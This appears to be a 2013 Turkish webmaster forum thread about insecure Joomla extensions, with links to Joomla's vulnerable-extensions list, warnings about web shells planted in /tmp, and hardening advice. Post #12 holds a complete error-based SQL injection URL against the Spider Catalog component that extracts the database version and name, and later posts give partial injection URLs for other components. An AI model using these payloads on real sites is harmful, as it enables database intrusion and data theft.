• 03-01-2013, 12:01:14
    #10
    Üyeliği durduruldu
    TeQNyC adlı üyeden alıntı: mesajı görüntüle
    Yukarı aldım, konunun güncelliğini yitirmemesi dileği ile.

    İyi forumlar
    Herzaman insanlığa faydalı olmak. =)
  • 06-01-2013, 00:34:29
    #11
    http://docs.joomla.org/Vulnerable_Extensions_List

    Yukarıdaki sayfa da joomla güvenli olmayan eklentiler ve bunlar ile ilgili gelişmeleri bulabilirsiniz.

    Güvenli olmayan eklentileri bildirmek için aşağıdaki sayfayı kullanabilirsiniz.
    http://extensions.joomla.org/index.p...workgroup_view
  • 06-01-2013, 02:56:03
    #12
    Üyeliği durduruldu
    Müşterimin isteği doğrultusunda spider catalog eklentisini onarmaya başlamıştım. Bileşeni inceledikten sonra sql lerde sorun olduğunu farkettim ve araştırmaya koyuldum.

    Sql açığı - Exploit;
    index.php?option=com_spidercatalog&product_id=-1%27%20or%201%3d1%2b%28select%201%20and%20row%281% 2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCA T%28version%28%29,0x3D,database%28%29,0x3D,0x3D,0x 3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from% 20%28select%201%20union%20select%202%29a%20group%2 0by%20x%20limit%201%29%29%2b%27&view=showproduct&p age_num=1&back=1

    eklentinin sahibi ayrı bir dünyada olmasıyla birlikte desteği hiç yok.

    Spider Catalog eklentisini konuya yazana kadar kullanmamanızı öneririm.

    Kolay gelsin.
  • 06-01-2013, 13:22:32
    #13
    Güzel konu, güncel kalması ümidiyle.

    Bu arada joomla kullananlar mutlaka arada birde olsa /tmp klasörü içerisine baksınlar. Sunucu kaynaklı olarak bu klasörün içerisine shell dosyası yüklenmiş olabiliyor. Buradaki index.html dosyaları haricindekileri silebilirsiniz.
  • 06-01-2013, 14:31:33
    #14
    Com_Ornekek da acik var

    http://orneksite.com/index.php?optio...x)a)+and+1%3D1
  • 07-01-2013, 14:53:59
    #15
    Üyeliği durduruldu
    kingofseo adlı üyeden alıntı: mesajı görüntüle
    to exploit;
    http://[TARGET]/index.php?option=com...sk=program&id=[sql]

    teşekkürler
  • 11-01-2013, 03:59:58
    #16
    Bu aralar sizden habersiz sitenize kurulmuş bileşen yada modüle rastladınız mı hiç?

    Bir sitemde böyle bir problem var, admin girişi yapılmadan bileşen ve modül kurulumu yapılmış. İçlerinde shell dosyaları var.
  • 11-01-2013, 10:45:08
    #17
    Üyeliği durduruldu
    enxdesigN adlı üyeden alıntı: mesajı görüntüle
    Bu aralar sizden habersiz sitenize kurulmuş bileşen yada modüle rastladınız mı hiç?

    Bir sitemde böyle bir problem var, admin girişi yapılmadan bileşen ve modül kurulumu yapılmış. İçlerinde shell dosyaları var.
    1.5 sürümündemi yaşadınız enes bey
  • 11-01-2013, 13:20:55
    #18
    Joomla Eklenti Açıklarını Net Şekilde Belirtmeyiniz ! Şuan 1.5 2.5 Sürümlerinde Upload Açığı Vardır. + Tmp Dizin chmod ayarını 644 yapınız ve ftp şifreleriniz genel yapılandırmadan kaldırınız. 1.5 sürümleri için yüklenen temalara chmod değerini vermeniz gerekmektedir tema edit vs bunlara müsade etmeyiniz. En Sağlık Modül Eklentileri Joomla.org ! Extensions dan edinin ve hep güncel tutulan eklentiler kullanın.